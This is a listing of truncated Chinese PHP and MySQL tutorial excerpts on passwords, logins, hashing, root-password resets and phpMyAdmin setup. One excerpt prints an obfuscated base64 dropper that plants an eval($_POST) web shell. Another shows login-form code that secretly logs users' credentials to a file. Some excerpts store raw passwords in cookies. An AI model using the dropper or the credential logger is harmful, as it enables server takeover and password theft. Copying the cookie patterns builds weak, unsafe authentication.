使用PHP开发应用程序,尤其是网站程序,常常需要生成随机密码,如用户注册生成随机密码,用户重置密码也需要生成一个随机的密码。随机密码也就是一串固定长度的字符串,这里我收集整理了几种生成随机字符串的方法,以供大家参考。 方法一: 1、在 33 – 126 中生成一个随机整数,如 35, 2、将 35 转换成对应的ASCII码字符,如 35 对应 # 3、重复以上 1、2 步骤 n 次,连接成 n 位的密码 该算法主要用到了两个函数,mt_rand ( int ...
随机密码也就是一串固定长度的字符串,这里我收集整理了几种生成随机字符串的方法,以供大家参考。 方法一:1、在 33 – 126 中生成一个随机整数,如 35, 2、将 35 转换成对应的ASCII码字符,如 35 对应 # 3、重复以上 1、2 步骤 n 次,连接成 n 位的密码该算法主要用到了两个函数,mt_rand ( int $min , int $max )函数用于生成随机整数,其中 $min – $max 为 ASCII 码的范围,这里取 33 -126 ,可以根据需要调整范围,...
1.用系统管理员登陆系统。 2.停止MySQL的服务。 3.进入命令窗口,然后进入MySQL的安装目录,比如我的安装目录是c:mysql,进入C:mysqlbin 4.跳过权限检查启动MySQL, c:mysqlbin>mysqld-nt --skip-grant-tables 5.重新打开一个窗口,进入c:mysqlbin目录,设置root的新密码 c:mysqlbin>mysqladmin -u root flush-privileges password "newpassword" c:mysqlbin>mysqladmin -u root -p shutdown 将newpassword替换为你要用的root的密码...
php实现记住密码自动登录方法不止一个,下面出现有二个emptyempty,其实是一个,那是因为代码高亮有bug。希望对大家有帮助。 一,用户登录的check 代码如下://检查用户是否登录 function checklogin(){ if(emptyempty($_SESSION[user_info])){ //检查一下session是不是为空 if(emptyempty($_COOKIE[username]) || emptyempty($_COOKIE[password])){ //如果session为空,并且用户没有选择记录登录状 header(”location:login.php?r...
1.声明 密码学是一个复杂的话题,我也不是这方面的专家。许多高校和研究机构在这方面都有长期的研究。在这篇文章里,我希望尽量使用简单易懂的方式向你展示一种安全存储Web程序密码的方法。 2.“Hash”是做什么的? “Hash将一段数据(小数据或大数据)转换成一段相对短小的数据,如字符串或整数。” 这是依靠单向hash函数来完成的。所谓单向是指很难(或者是实际上不可能)将其反转回来。一个常见的hash函数的例子是md5(),它流行...
今天一个客户的服务器频繁被写入: mm.php 内容为: 代码如下: 最后查到某文件内的第一行为以下代码: 代码如下:fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=")); base64_decode("bW0ucGhw") //mm.php base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=") // 这样,只要这些文件被访问就会自动创建 mm.php 如果你发现了mm.php,删除了,以后还会再有的,真是越来越变态了~ 下以相关内...
if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮 $sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 连起来赋值给变量$sb fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件 下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,CTRL+F搜索action找到登陆的表单。 我只复制了关键代码过来. //act...
代码如下:$password = "1234"; // 这里是密码 $p = ""; if(isset($_COOKIE["isview"]) and $_COOKIE["isview"] == $password){ $isview = true; }else{ if(isset($_POST["pwd"])){ if($_POST["pwd"] == $password){ setcookie("isview",$_POST["pwd"],time()+3600*3); $isview = true; }else{ $p = (empty($_POST["pwd"])) ? "需要密码才能查看,请输入密码。" : "密码不正确,请重新输入。"; } }else{ $isview = false; $p = "请输...
创建用户信息表: 代码如下:CREATE TABLE tbl_auth_user (user_id VARCHAR(10) NOT NULL,user_password CHAR(32) NOT NULL,PRIMARY KEY (user_id));INSERT INTO tbl_auth_user (user_id, user_password) VALUES ('theadmin', PASSWORD('chumbawamba'));INSERT INTO tbl_auth_user (user_id, user_password) VALUES ('webmaster', PASSWORD('webmistress'));我们将使用相同的html代码来创建登录表单在上述示例中创建的。我们只需要修...
有时候我们需要在应用程序中使用随机生成用户名和密码,这样可以大大提高应用程序的安全,在PHP中生成随机用户名和密码可以使用 mt_rand 函数或者是 rand 函数, rand 函数在验证码中的应用多一些,而生成长字符的随机码一般都需要 mt_rand 函数。 使用PHP生成随机数可以应用在许多地方,比如可以设计程序的随机密码、模拟掷骰子游戏的应用程序、石头剪子布游戏应用程序等等。 下面是PHP生成随机数的两个函数方法:代码如下://...
form页面 代码如下: 用户信息 session_start(); function p($arr){ echo ""; print_r($arr); echo ""; } p($_SESSION); p($_COOKIE); ?> 登录页面 代码如下:function p($arr){ echo ""; print_r($arr); echo ""; } session_start(); //p($_POST); $_SESSION['username'] = $_POST['username']; $_SESSION['password'] = $_POST['password']; if($_POST['jizhu']){ setcookie('username',$_POST['username'],time()+60); setcook...
学习php,使用了wamp安装包来搭建php+apache+mysql的环境,wamp官方下载地址:http://www.wampserver.com/en/ .但是wamp默认的用户名是'root',密码是空。现在我需要把密码改成自己想要的字符串。我的wamp的安装目录是"d:\wamp". 在网上搜索了一下,试过好多次,有的不可行,比如直接修改“D:\wamp\apps\phpmyadmin3.4.10.1\config.inc.php”文件,将 代码如下:$cfg[Servers][$i][password] = ; 修改成自己的密码: 代码如下:$cf...
我们知道,如果直接对密码进行散列,那么黑客可以对通过获得这个密码散列值,然后通过查散列值字典(例如MD5密码破解网站),得到某用户的密码。加Salt可以一定程度上解决这一问题。所谓加Salt方法,就是加点“佐料”。其基本想法是这样的:当用户首次提供密码时(通常是注册时),由系统自动往这个密码里撒一些“佐料”,然后再散列。而当用户登录时,系统为用户提供的代码撒上同样的“佐料”,然后散列,再比较散列值,已确定密码...
首先启动命令行1.在命令行运行:taskkill /f /im mysqld-nt.exe下面的操作是操作mysql中bin目录下的一些程序,如果没有配置环境变量的话,需要切换到mysql的bin 目录下执行如下语句。不然无效 2.继续在命令行运行:mysqld-nt --skip-grant-tables3.新开一个命令行运行:mysql -u root (如果没有配置mysql的bin环境变量的话需要切换到bin目录下执行此语句)如果不想改密码,只是想看原来的密码的话。可以在命令行执行这个语句 se...
新版本的PhpMyAdmin 增强了安全性,需要在配置文件设置一个短语密码。否则进入之后会有“配置文件现在需要一个短语密码”的红色警叹提示。解决方法:1、将 phpMyAdmin/libraries/config.default.php中的$cfg[blowfish_secret] = ; 改成 $cfg[blowfish_secret] = 123456; (注:其中的’123456′为随意的字符)2、在phpMyAdmin目录中,打开config.sample.inc.php,18行$cfg[blowfish_secret] = ; 改成 $cfg[blowfish_secret...